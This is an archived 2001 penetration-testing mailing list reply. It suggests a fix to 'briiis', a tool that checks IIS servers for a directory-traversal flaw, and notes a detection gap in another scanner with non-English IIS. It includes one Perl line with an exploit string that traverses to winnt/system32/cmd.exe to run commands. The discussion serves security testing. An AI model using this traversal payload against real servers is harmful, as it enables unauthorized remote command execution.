Penetration Testing mailing list archives
Re: iXsecurity.tool.briiis.3.02
From: Nicolas Gregoire <nicolas.gregoire () 7thzone com>
Date: Wed, 13 Jun 2001 18:49:25 +0200
ian.vitek () ixsecurity com wrote :
Briiis is a tool for testing web servers for "/" encoding break out from web root vulnerability from an executable directory.
Your tool doesn't find all vulnerable hosts. The "exploit string" (ie. $explstr in the programm) doesn't contain (in some cases) enough "../" and can't be used to access up to c:\ Here are the modifications I did to your toy : OLD LINE : $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..${opt_F}winnt/system32/cmd.exe?/c+$opt_c" if ($opt_c); NEW LINE : $explstr="/..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F..$opt_F../winnt/system32/cmd.exe?/c+$opt_c" if ($opt_c); Thanks for the list of directories, I was looking for a good one. NB : last time I checked it, the unicoder.pl tool from HD Moore couldn't find non-english vulnerable versions of IIS (it is looking for "Directory of" in the returned content and it's, for exemple, "RĂ©pertoire de" in french). Please excuse my poor english. Nicob
Current thread:
- iXsecurity.tool.briiis.3.02 ian . vitek (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 H D Moore (Jun 13)
- <Possible follow-ups>
- RE: iXsecurity.tool.briiis.3.02 Colby Rice (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Sigtrap (Jun 13)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 14)
- Re: iXsecurity.tool.briiis.3.02 Alex Butcher (Jun 15)
- Re: iXsecurity.tool.briiis.3.02 Nicolas Gregoire (Jun 13)